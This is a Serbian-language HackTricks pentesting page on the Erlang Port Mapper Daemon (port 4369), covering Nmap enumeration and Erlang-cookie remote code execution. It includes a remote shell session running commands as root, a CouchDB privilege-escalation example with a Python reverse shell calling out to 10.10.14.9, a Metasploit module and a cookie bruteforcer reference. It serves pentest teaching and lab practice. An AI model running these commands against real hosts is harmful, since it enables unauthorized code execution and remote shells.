hacktricks/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>


# Osnovne informacije

**Erlang Port Mapper Daemon (epmd)** služi kao koordinator za distribuirane Erlang instance. On je odgovoran za mapiranje simboličkih imena čvorova na mašinske adrese, osiguravajući da je svako ime čvora povezano sa određenom adresom. Ova uloga **epmd**-a je ključna za besprekornu interakciju i komunikaciju između različitih Erlang čvorova preko mreže.

**Podrazumevani port**: 4369
```
PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
```
Ovo se podrazumevano koristi na instalacijama RabbitMQ i CouchDB.

# Enumeracija

## Ručno
```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369

#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
```
## Automatsko

Automatsko otkrivanje Erlang Port Mapper Daemon (EPMD) može biti korisno prilikom pentestiranja mrežnih usluga. EPMD je servis koji se koristi za upravljanje i mapiranje Erlang procesa na mreži. Ovaj servis je zadužen za registraciju Erlang čvorova i omogućava komunikaciju između njih.

Da biste automatski otkrili EPMD, možete koristiti alat poput Nmap-a. Nmap je popularan alat za skeniranje mreže koji može otkriti otvorene portove i identifikovati servise koji rade na tim portovima.

Kada koristite Nmap za otkrivanje EPMD-a, možete koristiti sledeću komandu:

```
nmap -p 4369 <cilj>
```

Ova komanda će skenirati ciljni sistem i proveriti da li je port 4369 otvoren. Ako je port otvoren, to ukazuje na to da je EPMD aktivan na ciljnom sistemu.

Nakon što otkrijete EPMD, možete iskoristiti različite tehnike za dalje pentestiranje. Na primer, možete pokušati da izvršite napad poput Erlang Distribution Protocol (EPMD) leak-a, koji omogućava napadaču da dobije informacije o Erlang čvorovima na mreži.

Važno je napomenuti da je pentestiranje mrežnih usluga legalno samo ako imate dozvolu vlasnika sistema. Uvek se pridržavajte etičkih smernica i zakona prilikom izvođenja bilo kakvih pentestiranja.
```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|     kazoo_apps: 11500
|_    kazoo-rabbitmq: 25672
```
# Erlang Cookie RCE

## Udaljena veza

Ako možete **procuriti autentifikacijski kolačić**, moći ćete izvršiti kod na hostu. Obično se ovaj kolačić nalazi u `~/.erlang.cookie` i generiše ga Erlang prilikom prvog pokretanja. Ako nije izmenjen ili postavljen ručno, to je nasumičan niz \[A:Z\] dužine 20 karaktera.
```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]

Eshell V8.1 (abort with ^G)

At last, we can start an erlang shell on the remote system.

(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
Više informacija na [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
Autor takođe deli program za bruteforceovanje kolačića:

{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}

## Lokalna veza

U ovom slučaju ćemo zloupotrebiti CouchDB da bismo lokalno povećali privilegije:
```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```
Primer preuzet sa [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
Možete koristiti **Canape HTB mašinu** da biste **vežbali** kako da **iskoristite ovu ranjivost**.

## Metasploit
```bash
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
```
# Shodan

* `port:4369 "na portu"`


<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>